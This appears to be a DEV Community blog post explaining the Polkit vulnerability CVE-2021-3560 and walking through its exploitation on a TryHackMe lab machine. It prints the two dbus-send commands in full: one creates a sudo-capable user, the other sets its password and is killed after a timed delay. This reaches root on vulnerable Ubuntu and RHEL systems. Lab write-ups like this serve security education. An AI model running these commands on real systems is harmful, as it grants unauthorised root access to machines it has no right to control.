DEV Community

Cinnamon1212
Cinnamon1212

Posted on

2 2

Polkit CVE-2021-3560

Background

Polkit (AKA PolicyKit) is an essential component in Unix-like OSs for controlling system wide privileges. As you can imagine, exploiting this can lead to some nasty privilege escalation. There were a few mainstream OSs vulnerable to this (such as Ubuntu 20.04 and Red Hat Enterprise Linux 8), making this a very impactful exploit.

Understanding how and why this works

The original report can be found here.

Polkit is used to allocate privileges for users and processes. This exploit takes advantage of our ability to kill a dbus-send command the dbus daemon is able to pass Polkit the correct ID. In turn, Polkit errors and substitutes a 0 (all privs/root).

Demonstration

I'll be using the polkit box from TryHackMe to demonstrate this
We'll follow through the tutorial process. Our first command is:

time dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:attacker string:"Pentester Account" int32:1
Enter fullscreen mode Exit fullscreen mode

It's pretty long, let's dissect it. This command will be ran and monitored using "time". Remember we need time in order to check when we need to kill the dbus-send command. Our dbus-send command is going to request to create a user called attacker (and print the reply back to us). Typically we'll see this happen in a GUI and we'd then be prompted to give a password.
That takes us to our next command:

dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts/User1000 org.freedesktop.Accounts.User.SetPassword string:'$6$TRiYeJLXw8mLuoxS$UKtnjBa837v4gk8RsQL2qrxj.0P8c9kteeTnN.B3KeeeiWVIjyH17j6sLzmcSHn5HTZLGaaUDMC4MXCjIupp8.' string:'Ask the pentester' & sleep 0.005s; kill $!'
Enter fullscreen mode Exit fullscreen mode

To continue making our new account, we need to provide a password. This takes a Sha512Crypt hash as input and uses that for the password. In plain text, the password is "Expl01ted".
Finally, we'll use the delay that we previously found to kill the command before the dbus-daemon is able to give Polkit our ID.
We're given a new account called attacker with the password of Expl01ted that's automatically added as a sudoer. We can su into this account and then sudo su to root.

How does this look in practice?

Honestly? It looks simpler than you'd expect. Other than the timing of the command, this is a low complexity attack since there's copy and paste dbus commands that we can use for this. Though even without those, some understanding of using dbus utils will let you exploit this.

exploit

Postmark Image

Speedy emails, satisfied customers

Are delayed transactional emails costing you user satisfaction? Postmark delivers your emails almost instantly, keeping your customers happy and connected.

Sign up

Top comments (0)

Billboard image

The Next Generation Developer Platform

Coherence is the first Platform-as-a-Service you can control. Unlike "black-box" platforms that are opinionated about the infra you can deploy, Coherence is powered by CNC, the open-source IaC framework, which offers limitless customization.

Learn more

👋 Kindness is contagious

Please leave a ❤️ or a friendly comment on this post if you found it helpful!

Okay